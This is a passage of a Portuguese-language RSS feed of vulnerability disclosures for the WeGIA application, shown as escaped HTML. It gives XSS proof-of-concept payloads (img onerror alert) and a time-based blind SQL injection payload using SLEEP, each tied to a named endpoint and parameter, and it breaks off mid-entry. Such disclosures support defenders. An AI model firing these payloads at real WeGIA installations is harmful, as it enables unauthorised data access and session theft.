&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC3&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53935/image.png&amp;#34;
	width=&amp;#34;706&amp;#34;
	height=&amp;#34;853&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53935/image_hu_465e3ff624cdf11d.png 480w, /p/cve-2025-53935/image_hu_8c5a3f2d6253bfd4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;82&amp;#34;
		data-flex-basis=&amp;#34;198px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53936</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53936/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53936/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53936-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-nome_car&amp;#34;&amp;gt;CVE-2025-53936: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53936-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-nome_car&amp;#34;&amp;gt;CVE-2025-53936: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53936&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;personalizacao_selecao.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /html/personalizacao_selecao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome_car&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC5&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53936/image.png&amp;#34;
	width=&amp;#34;713&amp;#34;
	height=&amp;#34;856&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53936/image_hu_b5a24124f1a5f7aa.png 480w, /p/cve-2025-53936/image_hu_c19d2cd3d802d084.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;83&amp;#34;
		data-flex-basis=&amp;#34;199px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53937</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53937/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53937/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53937-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cargo-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-53937: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53937-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cargo-do-endpoint-controlphp&amp;#34;&amp;gt;CVE-2025-53937: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND (SELECT 4207 FROM (SELECT(SLEEP(10)))bAsK) AND &amp;amp;#39;LOon&amp;amp;#39;=&amp;amp;#39;LOon
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53937/image.png&amp;#34;
	width=&amp;#34;915&amp;#34;
	height=&amp;#34;924&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53937/image_hu_627764b08a014a29.png 480w, /p/cve-2025-53937/image_hu_9595da3164b60890.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;99&amp;#34;
		data-flex-basis=&amp;#34;237px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida da carga útil SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
